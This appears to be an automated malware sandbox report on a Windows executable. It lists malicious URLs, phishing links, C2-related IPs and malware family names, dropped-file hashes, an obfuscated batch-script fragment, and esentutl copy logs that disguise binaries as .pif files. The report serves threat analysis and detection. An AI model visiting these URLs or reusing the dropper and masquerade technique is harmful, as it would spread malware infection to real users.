bitbucket.org | https://getgreenshot.org | malicious | Unknown | 185.166.143.50
s3-w.us-east-1.amazonaws.com | yG53aU3gGm.exe | malicious | Unknown | 52.216.236.243
s3-w.us-east-1.amazonaws.com | https://su.onamoc.comano.us/XcEhOOWF1eS9pVi9RYkVJUURCV1RYR0RGd2dHRjNGcUhDdkhxWFpsdUp1UWlVZk83UmwwZjIrYmdvdzh3aFZ3V1NpdnFZTG4zSE16TDBDYU5yc2hZVWQ3UU1GNHRON29GNEpZZkN6SGY0Nk8rdVp2U2tOWmNQbDNnZ0lyalR3OXBmeDlrU0FLKzlVeHI4YXk2YUFmaTRMUUR5TkhWNlhtSzMwQ2IrcU16UzRXUWROZDFlc3k0aldiNy0td25BVUltZUhhSGpCZG5tRS0tN1VocVZyWm1JT2tITW5yVjN4YWNxdz09?cid=2310889346 | malicious | KnowBe4 | 52.217.199.225
s3-w.us-east-1.amazonaws.com | https://addto.password.land/XTi9aSHpxMU9CSkxBVXRhNGJhTWRLelpoTjl5MHNEUndKbFN6WU9rV1E1QnF0azRVN1Z3OEFWTE0rd0NldXVBQ3QyUGw3NXpZcDNMMHZ3QklHeU5CYzJBSmowVWUzYlJtS1FOZlBKQzNHRkV5dDRZckdUSHVVZ1h3VGRxL2VNZkw3RDBlOS9rSTYvK3FOU2UwdUd2OFA0KzZWaWc4ZmMrMzhaTnBpSzc3aU55UVlxUnlKZXRwdm9nPS0td0ZVSjRCSTRJclFTRVBuVS0tc2h0a3RIa3J5VGJRUUt5NUZCdmxvdz09?cid=2310145655 | malicious | KnowBe4 | 3.5.30.154
s3-w.us-east-1.amazonaws.com | https://accountsgoogle.me/cytech_developmentoperations-9d2f3a8e-7107-4b29-bc58-905af4e7e1c2/462/?id=16068&key=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6Im5hb3JyQHd0ZWEuY29tIiwiZXhwIjoxNzMxOTk2NzIzfQ.MoKjLaA6U4Hn3-TNwpA9VoBbllSNTwKl2--0wdNbn04/ | malicious | Unknown | 52.217.102.92
s3-w.us-east-1.amazonaws.com | Recent Services Delays Update.pdf | malicious | KnowBe4, PDFPhish | 16.182.32.241
s3-w.us-east-1.amazonaws.com | ft.exe | malicious | LummaC Stealer | 16.15.194.110
s3-w.us-east-1.amazonaws.com | https://temp.farenheit.net/XWU9WdXVLQ1BPcVcwN28vNmJmQW9rZy9JbGl2YjNqdU82UXRXbjVuRDE4WHZ2S3E3MTh0U0RLVVRZRjcvL3o0M1ZEZW5HMGQ2cUJ6Q1dmd0d6MzNsK1IwNkc0c1FQTlFkODFpdjI1RE5wTTZrZjNNL2ZlNTNzb3kvbXlTenlUOC94REZCNXJyYzEwcDduQ0JYM1JvQnpTTEhpdHIzWXlMVFh3dnJkNWo5N3JWODhWWVd4MWx5T0pqcUNZQlY3ZHRFTktEUGRLRVR4czR1dTMvY282WURmWGE0TkhiSkd2dkNZOUlGWUE9PS0tVVdmbHMzdlpZZDU2aFdnMy0teWdvSnFiVklFSk13UEoyUlNUQzd4Zz09?cid=2308276595 | malicious | KnowBe4 | 52.217.126.49
s3-w.us-east-1.amazonaws.com | https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406 | malicious | KnowBe4 | 52.217.132.33
s3-w.us-east-1.amazonaws.com | https://bitbucket.org/ziphose/obmen/downloads/Doc.7z | malicious | RMSRemoteAdmin | 3.5.30.93
s3-w.us-east-1.amazonaws.com | Recent Services Delays Update.pdf | malicious | KnowBe4, PDFPhish | 16.182.101.225
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
RELIABLESITEUS | 8a984491558f624bf313baf8453d547c0f714822058a2aca540f64dc78e4078f.exe | malicious | AsyncRAT, PureLog Stealer, zgRAT | 172.93.110.112
RELIABLESITEUS | https://trimmer.to:443/GWHMY | malicious | HTMLPhisher | 104.194.8.184
RELIABLESITEUS | ickTGSF56D.exe | malicious | Unknown | 141.98.153.205
RELIABLESITEUS | Image_Product_Inquiry_Request_Villoslada.exe | malicious | Remcos, GuLoader | 185.150.191.117
RELIABLESITEUS | Payload 94.75 (2).225.exe | malicious | Unknown | 172.93.106.189
RELIABLESITEUS | SecureMessageATT.html | malicious | HTMLPhisher | 104.194.8.184
RELIABLESITEUS | Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | malicious | Snake Keylogger, VIP Keylogger | 104.243.33.38
RELIABLESITEUS | http://holidaybunch.com | malicious | Unknown | 104.194.8.184
RELIABLESITEUS | SecuriteInfo.com.BScope.Trojan.Agentb.20481.11202.msi | malicious | Unknown | 103.195.103.66
RELIABLESITEUS | Priority_Quote_Request_Items_List.exe | malicious | Remcos | 185.150.191.117
AMAZON-02US | yG53aU3gGm.exe | malicious | Unknown | 185.166.143.50
AMAZON-02US | yG53aU3gGm.exe | malicious | Unknown | 185.166.143.50
AMAZON-02US | QUOTATON-37839993.exe | malicious | FormBook | 13.228.81.39
AMAZON-02US | http://www.javatpoint.com.cach3.com/ | malicious | Unknown | 52.76.92.93
AMAZON-02US | f3aef511705f37f9792c6032b936ca61.exe | malicious | Njrat | 18.157.68.73
AMAZON-02US | https://skillbridge.ca/onlinePaymentverify.html | malicious | Unknown | 108.158.75.100
AMAZON-02US | purchase order.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | main_mips.elf | malicious | Mirai | 13.218.109.96
AMAZON-02US | https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2 | malicious | Unknown | 52.77.73.5
AMAZON-02US | main_arm7.elf | malicious | Mirai | 108.143.162.104
AMAZON-AESUS | E8k9vfDETJ.exe | malicious | Unknown | 54.210.155.1
AMAZON-AESUS | http://www.javatpoint.com.cach3.com/ | malicious | Unknown | 3.233.144.220
AMAZON-AESUS | https://skillbridge.ca/onlinePaymentverify.html | malicious | Unknown | 44.219.182.139
AMAZON-AESUS | main_arm.elf | malicious | Mirai | 52.206.131.86
AMAZON-AESUS | dtkB4s3lqj.lnk | malicious | Unknown | 34.237.241.83
AMAZON-AESUS | Payment Adv HSBC.html | malicious | Unknown | 34.227.125.234
AMAZON-AESUS | https://do.not.click.on.this.link.instantrevert.net/XSEg2WDlKd2JCRDJOMWtwUGE5L0dpYzEyZUF0UjVQWmNQaWl2Q21KaDZSeUhuKzhLc243eHpPN1h4NjVNTnAzblZ6ZFZhaGwydDB1ZHJNUnQ5S25RRk0yTEtDbkhEZUlDZ29KY3lveXU2YW9kWkxheHEvTm1wWU5tWjUvT0lGZHkvR3k2MXBCbkYxdmJkZWl2NnNHa1dFcTFVd29uTklraVNkNHdISUFEbCszRE9tc3RETjdZSXdsaWl3PT0tLWJIaFJQTDlXUWhZQ0V6eWMtLWtnaFdmOHAzRW9zTE12VmNnY2lDS2c9PQ==?cid=2314349904 | malicious | KnowBe4 | 52.200.18.75
AMAZON-AESUS | https://docsend.com/view/nw5cttresp36nsvc | malicious | Unknown | 3.219.39.130
AMAZON-AESUS | FW_ _Reminder_ Membership Credit Verification - TPIS Industrial Services_ LLC.msg | malicious | Unknown | 18.213.11.84
AMAZON-AESUS | https://kitces.emlnk1.com/ | malicious | Unknown | 34.237.253.202
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  a0e9f5d64349fb13191bc781f81f42e1yliGAnBiRb.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  extracted_payload.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  YJ1Ia6bVqH.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  7Qn89l2e05.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  XA6KQrOcT2.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  cQr9VIHgFo.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  OdPdBlc1G0.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  Yon6wOFRoW.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 185.166.143.50
                                                                                                  • 3.5.30.3
                                                                                                   Match: C:\Users\Public\alpha.pif
                                                                                                   • 1DDHIzYyor.exe, Detection: malicious, Threat Name: DBatLoader
                                                                                                   • creatednew.hta, Detection: malicious, Threat Name: Cobalt Strike, DBatLoader, HTMLPhisher
                                                                                                   • Puyiaiob.PIF.bin.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
                                                                                                   • saw.bat, Detection: malicious, Threat Name: Remcos, DBatLoader
                                                                                                   • A1 igazol#U00e1s.cmd, Detection: malicious, Threat Name: DBatLoader, FormBook
                                                                                                   • kURjHPmRCx.exe, Detection: malicious, Threat Name: DBatLoader, Remcos
                                                                                                   • EPTMAcgvNZ.exe, Detection: malicious, Threat Name: DBatLoader, PureLog Stealer, Snake Keylogger
                                                                                                   • AWkpqJMxci.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
                                                                                                   • D2pQ4J4GGZ.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
                                                                                                   • C6dAUcOA6M.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer
                                                                                                                      Process:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):104
                                                                                                                      Entropy (8bit):5.155774305505572
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMAydJTsbxcXycPwov:HRYFVmTWDyzMdJTExmycPwy
                                                                                                                      MD5:D0BCF22E099BB4B54C3700C5E31919AB
                                                                                                                      SHA1:60368C99A6E266AA1DA0B4962E6C531305CB7A86
                                                                                                                      SHA-256:09DF36D6A06DAC5581E168BBB67B33B69850C4D7AE3A992569A9FEA490D370FE
                                                                                                                      SHA-512:87D9F0DBF7441F060124C264BAB89A3474B9BBA02E4092A5DCD8A2CABB8A9D1A6D1F62E695B513A7A6784B48D3F43EF1C39F7AF3F03F9F1876DE0A0755C7BE9E
                                                                                                                      Malicious:true
                                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF"..IconIndex=946522..HotKey=89..
                                                                                                                      Process:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):826217
                                                                                                                      Entropy (8bit):7.223436374494288
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:JIMRHxhpUrqZO1/r5p1iGOjvTZRZWq0VA0tSFhM0zhwPqgLvvXX:WMRR3Kq81/rXQljvTQquA0D01wxXX
                                                                                                                      MD5:D8DF974C1181F3091EC4F0467F16825A
                                                                                                                      SHA1:F41488DB793F8F91BBCB7784053D9C84AA781A78
                                                                                                                      SHA-256:D62B6AED4ED0205104E1196C4CDB0558EEFB3BE3EF74DC6891F7EBB3A562E9DA
                                                                                                                      SHA-512:0103575E38DF8D7435B51CBCDE00FCBF3978ADFE90B4A09874DD3B4BAAB7B4A40D0F29AEAC27367135700753CBB32C7C8BCAE14D6D75818376BDA7013E71F377
                                                                                                                      Malicious:true
                                                                                                                      Preview:bja..cm..........................................................................................................................bja..cm............bja..cm.'0..#*&.'32)...dhm...\2...CkH...[n47 q/.Y4.g9m....Re.8l.i......0..J..V..dLJ(-.|.m.\..n.3ni.]..f.-.L..-T....Z.(.Q.u.]..g..U/.+..S..........lR^=.].YL...Q../.C..o..;nHz....A/8...JFdc..f..@(...H...`J7(..1.:....hm]uol..`S...$..2...SbE...`[1/..2O.)%.?....$.,.._(..JU.....G.n.J...x...H.L.S.E.W.....>.C.@t.........^m(.Zp#+s..V.[.CDCS9.p..f.4l.`.B..Z$(.*..>/.*..N1.....#..I..mLsB..*.I...A]..c8....].B.7.N|i.IK.jY.. #..&....R...Fa..db-.#q0V.@!r:g..qj$.&)#.4K....ixZ*.m5..!+.&k...wkM13...nghv).b..z.-.3.m...0<xM..$P....+G#.W....f&1.[.m..p=3.X..vRaA.D.ma.X&.)j.]C..#...7YRz. T.AFA....+....toea..H&..e..T..>...`.R.,..".<u..8.N$WE.m.../.... ..F'.S+5,P..i/...?.>.N.'.1.'dS}m.?ES.\.J.q*.r)w.....a"X.wJe.>.MY3.I.].*.>...rI'y..'7..ehva.f'#".!..:$.'P .Q..<Z...'L.gO8Y?..["N...*...(&B'..F..nk.+$.#OOD];..13..../.\5]..E..##....c#,^ .%'..'!*
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1285120
                                                                                                                      Entropy (8bit):6.607286301391161
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Kg60JY2tAtZNMaMIcqRPl1Q9AXUY/jIU:Kg6PtM+tm9AXHjIU
                                                                                                                      MD5:E4696BE1368F7AC260C605C7B4F7EEAF
                                                                                                                      SHA1:D73A7226926B44F66D94FF7B229EF8243976EB6D
                                                                                                                      SHA-256:592624F30B177058EBA9B5B36E2E72BEA42AF95BF1552CA9A9CA28C4E1E6CFEB
                                                                                                                      SHA-512:F39677A025E865CF583899A0B5F10608F0C857DF5A3ABD79DBEBEA8FBD9F6BF31EC750B1143EE833594825512972EEC8D8D865E25DDE2AF3E8885CD7528F60F9
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................`...8......\w............@..........................0...................@...........................p...&...@..........................pr..................................................Hw...............................text....W.......X.................. ..`.itext.......p.......\.............. ..`.data...............d..............@....bss....$8...0...........................idata...&...p...(..................@....tls....4............:...................rdata...............:..............@..@.reloc..pr.......t...<..............@..B.rsrc........@......................@..@.............0......................@..@................................................................................................
                                                                                                                      Process:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4
                                                                                                                      Entropy (8bit):2.0
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:vv:3
                                                                                                                      MD5:B0591B6427C74B9962AD7C1528ECEC4C
                                                                                                                      SHA1:A1A2485028183E103D1EE0EF384FA362C4CFE0B0
                                                                                                                      SHA-256:A8D5248315D1C52250334479AA0E6C5B3B56F708219BB48DA119A9F44D8CEDB8
                                                                                                                      SHA-512:0979BAE9F1D3EE69BC90005E77A8BDD6F187BE494DA3D069D66BDF91C21777C728D8047A6FFD1E3C6176E40866DC234FD2651C26CCC1343E0634BE135F01E996
                                                                                                                      Malicious:false
                                                                                                                      Preview:81..
                                                                                                                      Process:C:\Users\user\Desktop\jW3NEKvxH1.exe
                                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):62357
                                                                                                                      Entropy (8bit):4.705712327109906
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                      MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                      SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                      SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                      SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                      Malicious:true
                                                                                                                      Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):236544
                                                                                                                      Entropy (8bit):6.4416694948877025
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                      MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                      SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                      SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                       • Filename: 1DDHIzYyor.exe, Detection: malicious
                                                                                                                       • Filename: creatednew.hta, Detection: malicious
                                                                                                                       • Filename: Puyiaiob.PIF.bin.exe, Detection: malicious
                                                                                                                       • Filename: saw.bat, Detection: malicious
                                                                                                                       • Filename: A1 igazol#U00e1s.cmd, Detection: malicious
                                                                                                                       • Filename: kURjHPmRCx.exe, Detection: malicious
                                                                                                                       • Filename: EPTMAcgvNZ.exe, Detection: malicious
                                                                                                                       • Filename: AWkpqJMxci.exe, Detection: malicious
                                                                                                                       • Filename: D2pQ4J4GGZ.exe, Detection: malicious
                                                                                                                       • Filename: C6dAUcOA6M.exe, Detection: malicious
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18944
                                                                                                                      Entropy (8bit):5.742964649637377
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                      MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                      SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                      SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                      SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):593
Entropy (8bit): 4.673826245764139
Encrypted: false
SSDEEP: 12:q82XAxTzAeSbZ7u0wxDDDDDDDDjCaY50OaYAqilTB8NGNWz:bFxTzAp7u0wQak1asilt8Nlz
MD5: 7063A9CACA6A15AD68C61592ED0AB4F0
SHA1: E161AADDD3BE045AD88912726E69223EE0E7EA76
SHA-256: 1B9CF27DDF30006CAB866F3C9A459FA56C86946AA2DB3DC8E1E3BFB83114F64E
SHA-512: 6A37E8C3084B1A77904C293009E24D9083B8BEDFE7BAFC98CAF3E1552798955056FD99726DC0C42AABA38AEC19CE3BC4B0F7852D5BE64AC6BE71C5349ABD8461
Malicious: false
Preview: ..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\jW3NEKvxH1.exe...Destination File: C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x139c00 (1285120) (1 MB)....Total bytes written = 0x13a000 (1286144) (1 MB).......Operation completed successfully in 0.219 seconds.....
Process: C:\Windows\SysWOW64\esentutl.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 560
Entropy (8bit): 4.532578488470501
Encrypted: false
SSDEEP: 12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
MD5: 4D6C195EBA3736E57EF6A03F1EEEF490
SHA1: 237210C613550627B46D6D6AB82F396EACA3EA20
SHA-256: FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
SHA-512: 2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
Malicious: false
Preview: ..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.607286301391161
TrID:
• Win32 Executable (generic) a (10002005/4) 99.38%
• InstallShield setup (43055/19) 0.43%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
File name: jW3NEKvxH1.exe
File size: 1'285'120 bytes
MD5: e4696be1368f7ac260c605c7b4f7eeaf
SHA1: d73a7226926b44f66d94ff7b229ef8243976eb6d
SHA256: 592624f30b177058eba9b5b36e2e72bea42af95bf1552ca9a9ca28c4e1e6cfeb
SHA512: f39677a025e865cf583899a0b5f10608f0c857df5a3abd79dbebea8fbd9f6bf31ec750b1143ee833594825512972eec8d8d865e25dde2af3e8885cd7528f60f9
SSDEEP: 24576:Kg60JY2tAtZNMaMIcqRPl1Q9AXUY/jIU:Kg6PtM+tm9AXHjIU
TLSH: 8A559F4673B08633E4169D354BD6F79F5C2EFD303A20A8DE2BAA2D4CAD2D2D07765241
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 19135dc5d4d4cc45
Entrypoint: 0x46775c
Entrypoint Section: .itext
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: fd5b6f1de95e8d3bb65d74f763b0b320
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00466550h
call 00007FF3548A4B99h
mov eax, dword ptr [00472B38h]
mov eax, dword ptr [eax]
call 00007FF3548F6ADDh
mov ecx, dword ptr [00472C98h]
mov eax, dword ptr [00472B38h]
mov eax, dword ptr [eax]
mov edx, dword ptr [00465144h]
call 00007FF3548F6ADDh
mov eax, dword ptr [00472B38h]
mov eax, dword ptr [eax]
call 00007FF3548F6B51h
call 00007FF3548A2BA4h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x77000 | 0x26cc | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x84000 | 0xbec00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0x7270 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x7b000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x77748 | 0x608 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65790 | 0x65800 | 96f62bec9c9c6c4fd98588caabf7d9e9 | False | 0.5204813539100985 | data | 6.522398430730482 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x67000 | 0x7a4 | 0x800 | 6bb8ba2eb69b5418fa4684f5c10d091c | False | 0.6044921875 | data | 6.071638724874274 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x68000 | 0xacd0 | 0xae00 | 26a3413559491a08fb28b01bb97df17e | False | 0.08494971264367816 | data | 5.945613906579282 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x73000 | 0x3824 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x77000 | 0x26cc | 0x2800 | 15090b6abde6267d4ea968c633c0c902 | False | 0.315625 | data | 5.111315272204222 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x7a000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x7b000 | 0x18 | 0x200 | 7583add25277ddf9ad8f833acb5c523d | False | 0.05078125 | data | 0.2069200177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
